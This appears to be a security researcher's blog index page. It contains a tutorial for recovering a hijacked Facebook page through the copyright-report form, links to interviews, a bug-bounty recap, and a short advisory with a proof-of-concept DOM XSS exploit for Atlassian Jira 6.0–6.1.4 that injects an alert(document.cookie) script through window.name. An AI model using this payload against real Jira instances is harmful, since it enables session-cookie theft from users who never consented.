How to recover your hacked Facebook page in less than 72 hours

INTRODUCTION

It's been a long time but I'm back now :) In the latest years I got so many requests from people that wanted to recover their hacked Facebook pages. The main problem is there are too many incidents of this type (maybe millions per month), so the response time until someone from Facebook staff will reply can be a long one. After all I decided to write a tutorial about how to do that in less than 48-72 hours.

Important to mention is that if you don't have the facebook page verified with Blue Badge, it is very hard to prove who is the real Page Owner, because it can be administrated by any valid facebook profile (this is the reason that doesn't exist the feature to recover a facebook page).

THE STORY

A short time ago, my friend DJ Asher had observed that he is no longer the Page Owner of his page and other suspicious facebook profile has this role; maybe the attacker didn't wanted to expose his access yet. My first advice for him it was to report the problem via Facebook Hacked contact form (available option: Someone else got into my account without my permission). Sadly as I said before, there nobody responds quickly.

The next step was to figure out a situation where a company like Facebook would respond to a complaint in less than 72 hours and in the same time it must be related to our main request. The impossible become possible! Why? Because once a facebook page has been stolen and you're no longer the Page Owner, it can be easily framed as infrigement of the Copyright / Trademark, as the attacker uses the content / identity of your business.

THE STEPS

1. Go to Facebook Help -> Policies and Reporting -> Intellectual Property -> Reporting Copyright violations -> This form

2. Reporting a Violation or Infringement of Your Rights -> [Check] Copyright -> [Check] Continue with your copyright report.

3. Copyright Report Form-> [Check] I found content which ... copyright -> [Check] Continue with my copyright report

4. [Fill] : Contact Information & Content You Want to Report & Your Copyrighted Work(s) & Declaration

5. After submitting the application, verify your email and Facebook Support

Note: [Very important] You must have some pictures/videos/posts that can also be visible on your other social media accounts (written on: Where can we see an authorized example of your work?). You can attach some screenshots with your accounts (logged in) to show that you're not an impostor.

AFTER

You'll receive an email from Facebook Legal Department with:

 Hi,

It looks like your copyright report concerns an entire Page, group, or profile that contains many individual photos, posts and other pieces of content. 
It’s unclear to us that you own the copyright in all these various items, or that all these various items would be infringing your copyrighted works.

So that we can better understand your report, please provide the following:

- A link (URL) to an authorized example of your copyrighted work or a detailed description of each copyrighted work that you allege is being infringed.
- A link (URL) to the post, photo or other item(s) you’re reporting, which can be found by clicking either directly on the content or on the time and date that appears in gray with the content (ex: "8 hours ago"). 
If a link isn't available, provide a detailed description of where it appears on Facebook, including the name of the person who posted it and the time they posted it.
- An explanation of how you believe the content you’ve reported infringes your rights.

If you believe some legal right other than copyright has been violated, such as trademark rights, please identify that right and include your basis for asserting it.
Once we’ve received this additional information, we’ll be happy to look into the matter further.

Thanks,
Facebook

You can answer with [demo]:

Hello,

Almost all photos & videos on the page that I reported (my page that was hacked) can be found on my other social media profiles. 
After [insert_date] I wasn't able to find anymore my facebook page in "Your Pages" section. 
Until now, the page seems to be [un]touched by the hacker and all my posts and the about section are [un]changed. 

That's the list with my accounts that are linked with my hacked facebook page and there you can find my music, videos and photos:

- Facebook Page : https://www.facebook.com/[your_account]
- Instagram     : https://www.instagram.com/[your_account]
- Spotify       : https://open.spotify.com/artist/[your_account]
- Soundcloud    : https://soundcloud.com/[your_account]
- Youtube       : https://www.youtube.com/user/[your_account]
- Twitter       : https://twitter.com/[your_account]
- Blog          : https://www.your_blog.tld/
etc...

After I saw in "Security and Login/Where You're Logged In" of my facebook account an unauthorized device from [Country/City] I reseted my password and logged out of all the sessions from that moment.
Let me know if you need anything else from me in order to solve this problem and to be able to own my Facebook page again.

All the best,
[your_name]

They'll be asking if you want to remove the page or to restore to the old account that was Page Owner:

 Hi,

Thanks for contacting us. Based on the information provided, it is unclear whether you're making an intellectual property claim or requesting an admin change for a Page or group.
Please note that intellectual property claims can result in the permanent removal of the content you're reporting from Facebook. 
We can't change the admins of a Page or group based on an intellectual property claim.
If you're requesting an admin change for a Page or group, a different team at Facebook might be able to help you with that issue. 
If you'd like us to forward your request to that team, please reply to this message with the following information:

* A link to the Facebook profile of the person requesting an admin change for a Page or group. 
If you're submitting this request on behalf of someone else, please provide a link to their profile, and the team will follow up with them directly.

* A link to the Facebook Page or group you're requesting an admin change for[...]
If instead you'd like to continue with your intellectual property claim, understanding that the reported content may be removed from Facebook, please respond to this message confirming this and we will look into the matter further.

Thanks,
Facebook

Reply with [demo]:

Hi,

Until now, I've reached almost 15k fans and I don't want to remove the page because I want to use it again. 

Request for the admin change:

- Facebook profile requesting admin change, myself : https://www.facebook.com/[your_facebook_profile]
- Facebook Page requesting an admin change for, my Artist Page that got hacked  : https://www.facebook.com/[your_hacked_facebook_page]/

Let me know what else do you need, to get my Facebook Page back.

All the best,
[your_name]

Now you can check Your Pages in your Facebook profile account.

Mission accomplished successfully

Thanks,

Razvan Cernaianu (TinKode).

THE END

Tags: 72 hours, Copyright, Hacked, Hacker, hacking tutorial, Razvan Cernaianu, Recover Facebook, TinKode 

Read More

Beverly Hills Film Festival: The Other Side Of Hacking [ShortFilm]

 About

A short documentary following four people in the world of Romanian cyber security, each serving a different role and purpose.  Full movie will be presented on 26-04-2017 at Beverly Hills Film Festival.

 Link to trailer

You can watch the video HERE.

The End

Tags: Beverly Hills Film Festival, CTO, Cyber Crime, Cyber Smart Defence, Hacker, Hacking, Interview, Madalin Dumitrur, Razvan Cernaianu, romanian hacker, Romanian story in four people, Security, Security Consultant, TV 

Read More

My interview for NBC News [USA]

About

My interview for NBC News - Growing Threat "Ransomware"

You can see the full report Sunday, May 8 on 'On Assignment.'

Link to video

Click HERE to watch the video.

The End

Tags: csd, CTO, Cyber Smart Defence, Dateline, Hacker, Hackerville, Hacking, Madalin Dumitru, NBC News Interview, On Assignment, pentest, Pentester, Razvan Cernaianu, TinKode 

Read More

Atlassian Jira - DOM XSS [Unauthenticated]

About

# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Blog: www.TinKode.com

Vulnerable code

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">
  <h1>${name}</h1>
</div> 

Exploit

<html>
<script>
 var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
</script>
</html> 

The End

Tags: atlassian, cybersmartdefence, dom xss, exploit, poc, TinKode 

Read More

Top 10 the most notorious hackers in internet history.

 ABOUT

[ TOP 10 ARCHIVE ]

In today’s day and age the internet can become a battleground for cyber wars. Hackers have been known to take down crucial websites, steal credit card information, take down gaming servers, and even use their expertise to assist government agencies. In the cyber world, some of these hackers have gained quite a bit of fame for their computer expertise, becoming some of the most notorious hackers in internet history.

Top 10

10. Lizard Squad
9. Johnathan James
8. Syrian Electronic Army
7. Gary McKinnon
6. Jeanson Anchet
5. Kevin Mitnick
4. Kristina Svechinskaya
3. ASTRA
2. TinKode
1. Anonymous

Link to video

Click HERE to watch the video on YouTube.

THE END

Tags: Cyber Crime, Cyber Smart Defence, Hacker, Hacking, nasa hacker, penetration testing, pentagon hacker, pentest, Pentester, Razvan Cernaianu, Security, Security Consultant, TinKode, top 10, top hackers 

Read More

Auditing United Airlines - Bug Bounty Program

ABOUT

Acum câteva luni de zile cei de la United Airlines au deschis un program de Bug Bounty puțin mai diferit decât cele deja existente. Adică, în loc să te premieze cu o anumită sumă de bani, te premiază în mile pe care le poți folosi pentru a zbura (or for car rentals, hotel stays, merchandise and more) cu linia lor sau una care face parte din cadrul Star Alliance. Recompensele sunt cuprinse între 50,000 / 250,000 până la 1,000,000 de mile. Ca să fiu mai explicit, sunt doar niște puncte de "loialitate". De exemplu, un zbor București - Dublin valorează cam 30,000 miles. Sună promițător, nu? :)

După câteva zile de la deschiderea programului, am început să caut și eu vulnerabilități în *.united.com (cred că așa era la început - după care au modificat lăsând valide doar câteva subdomenii - dar au specificat in TOS că pot schimba regulile când vor ei, deci nu putem comenta).

După 2 luni de așteptări și 29 de vulnerabilități descoperite și trimise, am primit primul răspuns:
o recompensă de 50,000 mile în cadrul programului MilesAge. În așteptare mai sunt încă alte 3 vulnerabilități (au fost validate, dar nu le-au reparat). Bănuiesc că și acelea vor fi încadrate tot cu 50,000 fiecare, rezultând un total de 200,000 de miles. Având în vedere că testarea a durat doar două zile, pot spune că sunt mulțumit.

THE END

Tags: audit, Bug Bounty, CTO, pentest, Pentester, Razvan Cernaianu, romanian hacker, TinKode, United Airlines 

Read More

Interview for Digi24 News Romania

LINK TO WATCH

You can watch the video HERE.

THE END

Tags: Cernaianu Manole Razvan, COO, CTO, Cyber Crime, Cyber Smart Defence, Hacker, Interview, Madalin Dumitru, pentest, Pentester, Razvan Cernaianu, Security, Security Consultant, TinKode 

Read More